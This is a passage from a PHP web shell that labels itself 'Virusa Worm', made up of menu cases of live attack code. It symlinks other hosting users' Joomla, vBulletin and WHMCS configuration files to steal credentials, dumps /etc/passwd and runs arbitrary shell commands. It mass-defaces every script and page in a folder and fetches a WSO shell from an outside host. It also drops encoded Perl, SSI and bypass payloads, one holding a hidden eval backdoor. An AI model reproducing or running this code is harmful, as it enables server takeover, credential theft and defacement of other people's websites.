  483.                     @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  484.                     @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  485.                     @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
  486.                     @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  487.                     @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm15.txt');
  488.                     @symlink('/home/' . $user . '/public_html/central/configuration.php', $user . '-whm-central.txt');
  489.                     @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  490.                     @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  491.                     @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  492.                     @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmcs.txt');
  493.                     @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support.txt');
  494.                     @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  495.                     @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-whmcs2.txt');
  496.                     @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm.txt');
  497.                 }
  498.                 echo '<b class="cone"><font face="Tahoma" color="#009900" size="2pt">Done -> <a target="_blank" href="vwconfig">Open configs</a></font></b>';
  499.             }
  500.             break;
  501.         case 'vkill':
  502.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Perl based symlink</font></b><br><br>
  503. <div align=center><table width=100% border=0><tr><td align=center></td></tr></table>
  504. <font face="Tahoma" color="#009900" size="2pt">Extract /etc/passwd</font></b><br><br><form method=post>
  505.     <input type=submit name=passx value="Extract"><p></form>';
  506.             if (isset($_POST['passx'])) {
  507.                 echo '<textarea rows=20 cols=50 name=usernames  >';
  508.                 $users = file("/etc/passwd");
  509.                 foreach ($users as $user) {
  510.                     $str = explode("
  511. ", $user);
  512.                     echo $str[0] . "
  513. ";
  514.                 }
  515.                 echo '</textarea>';
  516.             }
  517.             echo '<form method=post>
  518.     <font face="Tahoma" color="#009900" size="2pt"><input type=submit name=perl value="Perl based  ln -s"></font></form>
  519.     <p>';
  520.             if (isset($_POST['perl'])) {
  521.                 error_reporting(0);
  522.                 $vw = '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';
  523.                 $decryp = gzinflate(base64_decode($vw));
  524.                 mkdir('perl', 0777);
  525.                 $hope = fopen("perl/.htaccess", 'w');
  526.                 $hcon = "Options FollowSymLinks MultiViews Indexes ExecCGI
  527. AddType application/x-httpd-cgi .pl
  528. AddHandler cgi-script .pl
  529. AddHandler cgi-script .pl";
  530.                 fwrite($hope, $hcon);
  531.                 $pelfile = fopen("perl/vw.pl", "w");
  532.                 fwrite($pelfile, $decryp);
  533.                 chmod("perl/vw.pl", 0755);
  534.                 echo "<iframe src=perl/vw.pl width=50% height=70% ></iframe><br><br> ";
  535.                 echo "<font face='Tahoma' color='#b0b000' size='2pt'>check in this directory for configs files</font><br><br><b class='cone'><a href='perl/'  target='_blank'> Click Here </a></b><br><br>";
  536.             }
  537.             echo '<table width=100% border=0><tr><td align=center></td></tr></table>
  538. <form method=post>
  539.     <input type=submit name="ms" value="Read /etc/named.conf" /></form>';
  540.             if (isset($_POST['ms'])) {
  541.                 error_reporting(0);
  542.                 $cmd = "ls /var/named";
  543.                 $r = shell_exec($cmd);
  544.                 mkdir('conkill', 0777);
  545.                 $rr = " Options all
  546. DirectoryIndex Sux.html
  547. AddType text/plain .php
  548. AddHandler server-parsed .php
  549.  AddType text/plain .html
  550. AddHandler txt .html
  551. Require None
  552. Satisfy Any";
  553.                 $f = fopen('conkill/.htaccess', 'w');
  554.                 $agshell = symlink("/", "conkill/root");
  555.                 fwrite($f, $rr);
  556.                 echo '<form method=post><textarea rows=10 cols=35 name=web>';
  557.                 echo $r;
  558.                 echo '</textarea><br><br><input type=submit name=w value="Bypass Now !">
  559.         </form><br><br>';
  560.             }
  561.             error_reporting(0);
  562.             $webs = explode("
  563. ", $_POST['web']);
  564.             if (isset($_POST['w'])) {
  565.                 $webs = explode("
  566. ", $_POST['web']);
  567.                 echo "
  568. <div class='tmp'><table width='40%'><tr><td><font color='#b3b3b3'><b>Domains</b></font></td><td><font color='#b3b3b3'><b>Users</b></font></td><td><font color='#b3b3b3'><b>symlink</b> </font></td></tr></div>";
  569.                 foreach ($webs as $f) {
  570.                     $str = substr_replace($f, "", -4);
  571.                     $user = posix_getpwuid(@fileowner("/etc/valiases/" . $str));
  572.                     echo "<tr><td><font color=red>" . $str . "</font></td><td><font color=#b0b000>" . $user['name'] . "</td><td><div class='cone'><a target='_blank' href=conkill/root/home/" . $user['name'] . "/public_html/>Symlink</a></div></td></tr>";
  573.                     flush();
  574.                 }
  575.             }
  576.             echo '</table><br><br>';
  577.             break;
  578.         case "cmd":
  579.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Command Execution</font></b><br><p align="center">';
  580.             echo '
  581. <form method=get action="' . $me . '">
  582. <p align="center">
  583. <textarea rows="17" name="S1" cols="65">';
  584.             if (strlen($_GET['command']) > 1 && $_GET['execmethod'] != "popen") {
  585.                 echo $_GET['execmethod']($_GET['command']);
  586.             }
  587.             if (strlen($_POST['command']) > 1 && $_POST['execmethod'] != "popen") {
  588.                 echo $_POST['execmethod']($_POST['command']);
  589.             }
  590.             if (strlen($_GET['command']) > 1 && $_GET['execmethod'] == "popen") {
  591.                 popen($_GET['command'], "r");
  592.             }
  593.             echo '</textarea></p><p align="center">
  594. <input type=hidden name="vw" size="50" value="cmd"> <input type="text" name="command" size="50"> <select name=execmethod>
  595.  <option value="system">System</option>  <option value="exec">Exec</option>  <option value="passthru">Passthru</option><option value="popen">popen</option>
  596. </select> <input type="submit" value="Execute">
  597. </p></form>';
  598.             break;
  599.         case 'masde':
  600.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Mass Deface</font></b><br><br>';
  601.             if (!isset($_GET['code'])) {
  602.                 echo '<font face="Tahoma" color="#009900" size="2pt"><form action="" method="get">
  603. <input type="hidden" name="action" value="mass">
  604. <textarea cols="75" rows="15" name="code" id="source">Defaced by Virusa Worm.. lol..</textarea><br><br>
  605. <center><font color="#006600">Folder: </font> <input size="60" type="text" value="' . getcwd() . '" name="dir" style="border-top:none;"> <input type="submit" value="Deface it !" style="border-top:none;"></center>
  606. </form>';
  607.             } else {
  608.                 if (is_dir($_GET['dir'])) {
  609.                     $lolinject = $_GET['code'];
  610.                     foreach (glob($_GET['dir'] . "/*.php") as $injectj00) {
  611.                         $fp = fopen($injectj00, "a+");
  612.                         if (fputs($fp, $lolinject)) {
  613.                             echo $injectj00 . ' was injected<br>';
  614.                         } else {
  615.                             echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
  616.                         }
  617.                     }
  618.                     foreach (glob($_GET['dir'] . "/*.html") as $injectj00) {
  619.                         $fp = fopen($injectj00, "a+");
  620.                         if (fputs($fp, $lolinject)) {
  621.                             echo $injectj00 . ' was injected<br>';
  622.                         } else {
  623.                             echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
  624.                         }
  625.                     }
  626.                     foreach (glob($_GET['dir'] . "/*.htm") as $injectj00) {
  627.                         $fp = fopen($injectj00, "a+");
  628.                         if (fputs($fp, $lolinject)) {
  629.                             echo $injectj00 . ' was injected<br>';
  630.                         } else {
  631.                             echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
  632.                         }
  633.                     }
  634.                     foreach (glob($_GET['dir'] . "/*.asp") as $injectj00) {
  635.                         $fp = fopen($injectj00, "a+");
  636.                         if (fputs($fp, $lolinject)) {
  637.                             echo $injectj00 . ' was injected<br>';
  638.                         } else {
  639.                             echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
  640.                         }
  641.                     }
  642.                     foreach (glob($_GET['dir'] . "/*.js") as $injectj00) {
  643.                         $fp = fopen($injectj00, "a+");
  644.                         if (fputs($fp, $lolinject)) {
  645.                             echo $injectj00 . ' was injected<br>';
  646.                         } else {
  647.                             echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
  648.                         }
  649.                     }
  650.                     foreach (glob($_GET['dir'] . "/*.aspx") as $injectj00) {
  651.                         $fp = fopen($injectj00, "a+");
  652.                         if (fputs($fp, $lolinject)) {
  653.                             echo $injectj00 . ' was injected<br>';
  654.                         } else {
  655.                             echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
  656.                         }
  657.                     }
  658.                 } else {
  659.                     echo '<b><font color=red>' . $_GET['pathtomass'] . ' is not available!</font></b>';
  660.                 }
  661.             }
  662.             break;
  663.         case 'suphp':
  664.             echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Bypassed SuPHP</b><br><br><form method='POST'>
  665.  
  666. <input type='text' name='path' size='25' value=" . dirname('index.php') . " '>
  667. <input type='text' name='shell' size='25' value='http://files.xakep.biz/shells/PHP/wso.txt'>
  668. <input type='submit' value='Bypass' name='start'><br><br>";
  669.             echo "<textarea rows='8' cols='56'>virusa worm Mode :)
  670. ";
  671.             if ($_POST['start']) {
  672.                 $path = $_POST['path'];
  673.                 $file = $_POST['shell'];
  674.                 $htaccess = "suPHP_ConfigPath $path/vworm/php.ini";
  675.                 $phpini = "c2FmZV9tb2RlID0gT0ZGCnN1aG9zaW4uZXhlY3V0b3IuZnVuYy5ibGFja2xpc3QgPSBOT05FCmRpc2FibGVfZnVuY3Rpb25zID0gTk9ORQ==";
  676.                 $dir = "vworm";
  677.                 if (file_exists($dir)) {
  678.                     echo "[+] vworm Folder There Before :)
  679. ";
  680.                 } else {
  681.                     @mkdir($dir); {
  682.                         echo "[+] vworm Folder Created :D
  683. ";
  684.                     }
  685.                 }
  686.                 # Generate Sh3LL
  687.                $fopen = fopen("vworm/vw.php", 'w');
  688.                 $shell = @file_get_contents($file);
  689.                 $swrite = fwrite($fopen, $shell);
  690.                 if ($swrite) {
  691.                     echo "[+] Shell Has Been Generated Name : vw.php
  692. ";
  693.                 } else {
  694.                     echo "[~] Can't Generate Shell
  695. ";
  696.                 }
  697.                 fclose($fopen);
  698.                 # Generate Htaccess
  699.                $hopen = fopen("vworm/.htaccess", "w");
  700.                 $hwrite = fwrite($hopen, $htaccess);
  701.                 if ($hwrite) {
  702.                     echo "[+] htaccess Generated
  703. ";
  704.                 } else {
  705.                     echo "[~] Can't Generate htaccess
  706. ";
  707.                 }
  708.                 fclose($hopen);
  709.                 $ini = fopen("vworm/php.ini", "w");
  710.                 $php = fwrite($ini, base64_decode($phpini));
  711.                 if ($php) {
  712.                     echo "[+] PHP.INI Generated";
  713.                 } else {
  714.                     echo "[-] Can't Generate PHP.INI";
  715.                 }
  716.             }
  717.             echo "</textarea>";
  718.             break;
  719.         case 'ssi':
  720.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Ssi Bypasser</b><br>';
  721.             $ssine = 'PGh0bWw+DQo8dGl0bGU+U3NpIEJ5cGFzcyByZWNvZGVkIGJ5IFZpcnVzYSBXb3JtPC90aXRsZT48bGluayByZWw9InNob3J0Y3V0IGljb24iIGhyZWY9Imh0dHA6Ly93d3cuaWNvbmouY29tL2ljby9jL3UvY3UxYm1wZ2Ixay5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz48aGVhZD4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+ICBodG1sLGJvZHkgeyBtYXJnaW46IDA7IHBhZGRpbmc6IDA7IG91dGxpbmU6IDA7IH1heyBmb250LXNpemU6IDEycHg7IH1ib2R5IHsgZGlyZWN0aW9uOiBsdHI7ICBiYWNrZ3JvdW5kLWNvbG9yOiMxNTE1MTU7IGNvbG9yOiByZ2IoMCwgMTUzLCAwKTsgdGV4dC1hbGlnbjogY2VudGVyIH0gaW5wdXQsdGV4dGFyZWEsc2VsZWN0eyBmb250LXdlaWdodDogYm9sZDsgY29sb3I6ICMwMDAwMDA7IH1pbnB1dCx0ZXh0YXJlYSxzZWxlY3Q6aG92ZXJ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGNjMDA7IH0uaGVkciB7IGZvbnQtZmFtaWx5OiBUYWhvbWEsIEFyaWFsLCBzYW5zLXNlcmlmICA7ICBmb250LXNpemU6IDIycHg7IH0gDQouY29udCBheyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGNvbG9yOnJnYigwLCAxNTMsIDApOyBmb250LWZhbWlseTogVGFob21hLCBBcmlhbCwgc2Fucy1zZXJpZiAgOyBmb250LXNpemU6IDE2cHg7IHRleHQtc2hhZG93OiAwcHggMHB4IDNweCA7IH0uY29udCBhOmhvdmVyeyBjb2xvcjogI0ZGMDAwMCA7ICB0ZXh0LXNoYWRvdzowcHggMHB4IDNweCAjZmYwMDAwIDsgfS5jb25lIGF7IHRleHQtZGVjb3JhdGlvbjogbm9uZTsgY29sb3I6cmdiKDAsIDE1MywgMCk7IGZvbnQtZmFtaWx5OiBUYWhvbWEsIEFyaWFsLCBzYW5zLXNlcmlmICA7IGZvbnQtc2l6ZTogMTJweDsgdGV4dC1zaGFkb3c6IDBweCAwcHggM3B4IDsgfS5jb25lIGE6aG92ZXJ7IGNvbG9yOiAjRkYwMDAwIDsgdGV4dC1zaGFkb3c6MHB4IDBweCAzcHggI2ZmMDAwMCA7IH0udG1wIHRyIHRkeyBib3JkZXI6IHNvbGlkIDFweCAjMDA2NjAwOyBwYWRkaW5nOiAycHggOyBmb250LXNpemU6IDEzcHg7IH0udG1wIHRyIHRkIGEgeyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IH0uZm90ZXJ7IGZvbnQtc2l6ZTogOXB0OyBjb2xvcjogIzAwNjYwMCA7IHRleHQtYWxpZ246IGNlbnRlciB9LnRtcCB0ciB0ZDpob3ZlcnsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwY2MwMDsgfS5mb3R7IGZvbnQtZmFtaWx5OlRhaG9tYSwgQXJpYWwsIHNhbnMtc2VyaWY7IGNvbG9yOiAjMDA5OTAwIDsgZm9udC1zaXplOiAxMXB0OyB9LmZvciBhIDogaG92ZXJ7IGNvbG9yOiAjRkYwMDAwIDsgdGV4dC1zaGFkb3c6IDBweCAwcHggMXB4ICNGRjAwMDA7IH0uaXIgeyBjb2xvcjogI0ZGMDAwMDsgfTwvc3R5bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwvcD4NCjxmb3JtIG5hbWU9InoxZC1saXRlc3BlZWQiICBtZXRob2Q9InBvc3QiPg0KPHAgYWxpZ249ImNlbnRlciI+PGI+PGZvbnQgZmFjZT0iVGFob21hIiBjb2xvcj0iIzAwOTkwMCIgc2l6ZT0iMnB0Ij48Yj5Db21tYW5kIDogPGlucHV0IG5hbWU9ImNvbW1hbmQiIHZhbHVlPSJpZCIgc2l6ZT0iMzYiIHRhYmluZGV4PSIyMCI+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9IkJ5cGFzcyAhIj48L2ZvbnQ+PC9wPg0KPC9mb3JtPjxjZW50ZXI+DQo8P3BocA0KJGNvbW1hbmQgPSAkX1BPU1RbJ2NvbW1hbmQnXTsNCiR6MDB6ID0gJF9QT1NUWyd6MDB6J107DQppZigkY29tbWFuZCl7DQokejExZCA9ICI8Y2VudGVyPjxmb250IGNvbG9yPScjYjNiM2IzJyAvPjxwcmU+PHByZT4NCjxicj4NClZpcnVzYSBXb3JtDQo8YnI+DQo8YnI+DQo8IS0tI2V4ZWMgY21kPSckY29tbWFuZCcgLS0+IA0KDQoiOw0KJG9wZW5maWxlID0gZm9wZW4oIml6by5zaHRtbCIsInciKTsNCiR3cml0ZWludG8gPSBmd3JpdGUoJG9wZW5maWxlLCIkejExZCIpOw0KZmNsb3NlKCRvcGVuZmlsZSk7DQppZigkb3BlbmZpbGUpew0KfWVsc2V7DQp9DQp9DQpwYXJzZV9zdHIoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCRhKTsgaWYocmVzZXQoJGEpPT0naXonICYmIGNvdW50KCRhKT09OSkgeyBlY2hvICc8c3Rhcj4nO2V2YWwoYmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgiICIsICIrIiwgam9pbihhcnJheV9zbGljZSgkYSxjb3VudCgkYSktMykpKSkpO2VjaG8gJzwvc3Rhcj4nO30NCj8+DQo8cHJlPiANCiA8aWZyYW1lIHNyYz0iaXpvLnNodG1sIiAgd2lkdGg9IjgwJSIgaGVpZ2h0PSI3MCUiIGZyYW1lYm9yZGVyPSIxIj48L2lmcmFtZT4NCjwvcHJlPjxicj48L2JvZHk+PC9odG1sPjxmb250IGZhY2U9IlRhaG9tYSIgY29sb3I9IiMwMDY2MDAiIHNpemU9IjFwdCI+Q29kZWQgYnkgUmVkLVNlY3VyaXR5IEdyb3VwPC9mb250Pg==';
  722.             $file = fopen("ssine.php", "w+");
  723.             $write = fwrite($file, base64_decode($ssine));
  724.             fclose($file);
  725.             chmod("ssine.php", 0755);
  726.             echo "<iframe src=ssine.php width=70% height=60% frameborder=0></iframe>";
  727.             break;
  728.         case 'posget':
  729.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Bypass posix_getpwuid</b><br><br>';
  730.             echo '<form method="POST">
  731. <input size="20" value="0" name="min" type="text">
  732. <font face="Tahoma" color="#008800" size="2pt">to </font>
  733. <input size="20" value="1024" name="max" type="text"> <input value="Symlink" name="" type="submit">
  734. </form><br>';
  735.             if ($_POST) {
  736.                 $min = $_POST['min'];
  737.                 $max = $_POST['max'];
  738.                 echo "<div class='tmp'><table align='center' width='40%'><td><font color='#b3b3b3'><b>Domains</b></font></td><td><font color='#b3b3b3'><b>Users</b></font></td><td><font color='#b3b3b3'><b>Symlink</b> </font></td>";
  739.                 $p = 0;
  740.                 error_reporting(0);
  741.                 $list = scandir("/var/named");
  742.                 for ($p = $min;$min <= $max;$p++) {
  743.                     $user = posix_getpwuid($p);
  744.                     if (is_array($user)) {
  745.                         foreach ($list as $domain) {
  746.                             if (strpos($domain, ".db")) {
  747.                                 $domain = str_replace('.db', '', $domain);
  748.                                 $owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
  749.                                 if ($owner['name'] == $user['name']) {
  750.                                     $i+= 1;
  751.                                     $cheechee = checkAlexa($domain);
  752.                                     echo "<tr><td class='cone'><a href='http://" . $domain . " '>" . $domain . "</a> <font color='#d0d000'>- </font><font color='#b3b3b3'>" . $cheechee . "</font></td><center><td class='cone'><font color='#d0d000'>" . $user['name'] . "</font></center></td><td class='cone'><center><a href='sim/rut" . $owner['dir'] . "/public_html/' target='_blank'>Dir</a></center></td>";
  753.                                 }
  754.                             }
  755.                         }
  756.                     }
  757.                 }
  758.                 echo "<center><font face='Tahoma' color='#d0d000' size='2pt'>Total Domains Found:</font><font face='Tahoma' color='#d0d000' size='2pt'> " . $i . "</font></center><br />";
  759.             }
  760.             echo "</table></div><br><br>";
  761.             break;
  762.         case 'bforb':
  763.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Bypass Forbidden Server</b><br>';
  764.             mkdir('bforb', 0755);
  765.             chdir('bforb');
  766.             $bforb = 'PGhlYWQ+PHRpdGxlPkJ5cGFzcyBGb3JiaWRkZW4gYnkgVmlydXNhIFdvcm08L3RpdGxlPjwvaGVhZD48bGluayByZWw9InNob3J0Y3V0IGljb24iIGhyZWY9Imh0dHA6Ly93d3cuaWNvbmouY29tL2ljby9jL3UvY3UxYm1wZ2Ixay5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz48c3R5bGUgdHlwZT0idGV4dC9jc3MiPjwhLS0gYm9keSB7YmFja2dyb3VuZC1jb2xvcjogIzE1MTUxNTsgZm9udC1mYW1pbHk6Q291cmllcgltYXJnaW4tbGVmdDogMHB4OyBtYXJnaW4tdG9wOiAwcHg7IHRleHQtYWxpZ246IGNlbnRlcjsgTmV3O2ZvbnQtc2l6ZToxMnB4O2NvbG9yOiMwMDk5MDA7Zm9udC13ZWlnaHQ6NDAwO30gYXt0ZXh0LWRlY29yYXRpb246bm9uZTt9IGE6bGluayB7Y29sb3I6IzAwOTkwMDt9IGE6dmlzaXRlZCB7Y29sb3I6IzAwODA4MDt9IGE6aG92ZXJ7Y29sb3I6I2ZmMDAwMDt9IGE6YWN0aXZlIHtjb2xvcjojMDBhMmEyO30gLS0+PCEtLSBNYWRlIEJ5IFZpcnVzYSBXb3JtIC0tPjwvc3R5bGU+PGJyPjxicj48Ym9keSBiZ0NvbG9yPSIxNTE1MTUiPjx0cj48dGQ+PD9waHAgZWNobyAiPGZvcm0gbWV0aG9kPSdQT1NUJyBhY3Rpb249Jyc+IiA7IGVjaG8gIjxjZW50ZXI+PGlucHV0IHR5cGU9J3N1Ym1pdCcgdmFsdWU9J0J5cGFzcyBpdCcgbmFtZT0ndmlydXNhJz48L2NlbnRlcj4iOyBpZiAoaXNzZXQoJF9QT1NUWyd2aXJ1c2EnXSkpeyBzeXN0ZW0oJ2xuIC1zIC8gdmlydXNhLnR4dCcpOyAkZnZja2VtID0nVDNCMGFXOXVjeUJKYm1SbGVHVnpJRVp2Ykd4dmQxTjViVXhwYm10ekRRcEVhWEpsWTNSdmNubEpibVJsZUNCemMzTnpjM011YUhSdERRcEJaR1JVZVhCbElIUjRkQ0F1Y0dod0RRcEJaR1JJWVc1a2JHVnlJSFI0ZENBdWNHaHcnOyAkZmlsZSA9IGZvcGVuKCIuaHRhY2Nlc3MiLCJ3KyIpOyAkd3JpdGUgPSBmd3JpdGUgKCRmaWxlICxiYXNlNjRfZGVjb2RlKCRmdmNrZW0pKTsgJHZpcnVzYSA9IHN5bWxpbmsoIi8iLCJ2aXJ1c2EudHh0Iik7ICRydD0iPGJyPjxhIGhyZWY9dmlydXNhLnR4dCBUQVJHRVQ9J19ibGFuayc+PGZvbnQgY29sb3I9I2ZmMDAwMCBzaXplPTIgZmFjZT0nQ291cmllciBOZXcnPjxiPkJ5cGFzc2VkIFN1Y2Nlc3NmdWxseTwvYj48L2ZvbnQ+PC9hPiI7IGVjaG8gIjxicj48YnI+PGI+RG9uZS4uICE8L2I+PGJyPjxicj5DaGVjayBsaW5rIGdpdmVuIGJlbG93IGZvciAvIGZvbGRlciBzeW1saW5rIDxicj4kcnQ8L2NlbnRlcj4iO30gZWNobyAiPC9mb3JtPiI7ICA/PjwvdGQ+PC90cj48L2JvZHk+PC9odG1sPg==';
  767.             $file = fopen("bforb.php", "w+");
  768.             $write = fwrite($file, base64_decode($bforb));
  769.             fclose($file);
  770.             chmod("bforb.php", 0755);
  771.             echo "<iframe src=bforb/bforb.php width=60% height=60% frameborder=0></iframe>";
  772.             break;
  773.         case 'sym':
  774.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Symlink Server</font></b><br><br>';
  775.             if (!is_file('named.txt')) {
  776.                 $d00m = @file("/etc/named.conf");
  777.             } else {
  778.                 $d00m = @file("named.txt");
  779.             }
  780.             if (!$d00m) {
  781.                 die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
  782.             } else {
  783.                 echo "<div class='tmp'><table align='center' width='40%'><td><font color='#b3b3b3'><b>Domains</b></font></td><td><font color='#b3b3b3'><b>Users</b></font></td><td><font color='#b3b3b3'><b>symlink</b> </font></td>";
  784.                 foreach ($d00m as $dom) {
  785.                     if (eregi("zone", $dom)) {
  786.                         preg_match_all('#zone "(.*)"#', $dom, $domvw);
  787.                         flush();
  788.                         if (strlen(trim($domvw[1][0])) > 2) {
  789.                             $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
  790.                             flush();
  791.                             $site = $user['name'];
  792.                             @symlink("/", "sim/rut");
  793.                             $site = $domvw[1][0];
  794.                             $ir = 'ir';
  795.                             $il = 'il';
  796.                             if (preg_match("/.^$ir/", $domvw[1][0]) or preg_match("/.^$il/", $domvw[1][0])) {
  797.                                 $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $domvw[1][0] . "</div>";
  798.                             }
  799.                             echo "
  800. <tr>
  801.  
  802. <td>
  803. <div class='cone'><a target='_blank' href=http://www." . $domvw[1][0] . "/>" . $site . " </a> </div>
  804. </td>
  805.  
  806.  
  807. <td><font face='Tahoma' color='#d0d000' size='2pt'>
